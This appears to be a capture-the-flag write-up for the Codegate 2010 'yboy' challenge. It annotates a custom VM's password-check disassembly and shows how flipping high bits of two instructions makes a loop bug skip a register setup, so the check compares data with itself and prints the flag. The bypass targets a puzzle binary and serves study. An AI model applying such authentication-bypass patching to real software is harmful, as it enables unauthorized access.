0020: r60 = set_imm 0, ff ; r60 = 255 0021: r61 = set_imm 0, 1 ; r61 = 1 0022: r4 = set_imm 5, 39 ; r4 = 0x539 (1337) 0023: r3 = inputchar r0, r0 ; r3 = getc() 0024: r50 = set_imm 0, a ; r50 = '\n' 0025: r0 = store r4, r3 ; data[r4] = r3 0026: r0 = nop r0, r0 0027: r10 = sub r3, r50 ; r10 = r3 - '\n' 0028: r10 = not r10, r0 ; !r10 0029: r11 = set_imm 0, 2f ; r11 = 0x002f 002a: r0 = branch r10, r11 ; if (r3 == '\n') goto 002f 002b: r4 = add r61, r4 ; r4++ 002c: r10 = sub r60, r3 ; r10 = 255 - r3 002d: r11 = set_imm 0, 23 ; 0x0023 002e: r0 = branch r10, r11 ; if (r3 != EOF) goto 0023 002f: r19 = set_imm 5, 39 ; r19 = 0x539 (1337) 0030: r20 = set_imm 0, 0 ; r20 = 0 0031: r21 = set_imm 0, 23 ; r21 = 0x23 (35) 0032: r21 = sub r21, r20 ; r21 = r21 - r20 0033: r21 = not r21, r0 ; !r21 0034: r22 = set_imm 0, 5e ; 0x005e 0035: r0 = branch r21, r22 ; if (r20 == 35) goto 005e //goodpassword 0036: r21 = load r20, r0 ; r21 = data[r20] 0037: r25 = add r19, r20 ; r25 = 0x539 + r20 0038: r0 = nop r0, r0 0039: r26 = load r25, r0 ; r26 = data[0x539 + r20] 003a: r26 = sub r21, r26 ; r26 = r26 - r21 003b: r22 = set_imm 0, 41 ; 0x0041 003c: r0 = branch r26, r22 ; if (data[r20] != data[0x539+r20) goto 0041 //badpassword 003d: r23 = set_imm 0, 1 ; r23 = 1 003e: r20 = add r20, r23 ; r20++ 003f: r22 = set_imm 0, 31 ; 0x0032 0040: r0 = branch r22, r22 ; goto 0032 //loop
The code above read password from stdin, stores it inside data array starting at data[0x539] then compares the input with the content of secret.key stored at the beginning of data[0] (35 DWORDS = 140 bytes).
What if we modify the MSB bit of branch instruction at 002a?
//modify code[2a] from 0x0c000a0b to 0x8c000a0b
002a: r0 = branch r10, r11 ; if (r3 == '\n') goto 002f
When '\n' is read, the branch() instruction will set PC to the password check code at 002f (002f: r19 = set_imm 5, 39 ; r19 = 0x539). However, because the opcode now is 0x8c instead of 0x0c, PC will be also increased by 1 unexpectedly due to the bug at main loop code mentioned above. Hence, the PC will point to instruction at 0030 (0030: r20 = set_imm 0, 0 ; r20 = 0) instead of 002f.
Since the instruction at 002f is skipped, r19 register will be 0 (default value) instead of 0x539. The VM code becomes
//r19 register value is 0 while it's expected to be 0x539
r20 = 0;
while (1) {
if (r20 == 0x23) goto correctpass;
if (data[r20] != data[r19+r20]) goto wrongpass;
r20++;
}
It's comparing identical data. Yboy Pwned!
Exploit
- Copy the codefile, edit it to set the 32nd and 64th bits at offset 0x2a
code[2a] 0x0c000a0b -> 0x8c000a0b
code[2b] 0x03043d04 -> 0x83043d04
- Run the yboy with the new codefile
- Press enter and get the flag
hugh@codegate-desktop:/tmp/rd$ ./yboy newcodefile
...
Enter password>>
Greetz hackers. Keep up the good work. Stay sharp. Disobey misinformation.
Your flag is: TEA - Toiletpaper Esque Aspirations
References
Keywords: TEA, VM, Xbox, codegate 2010


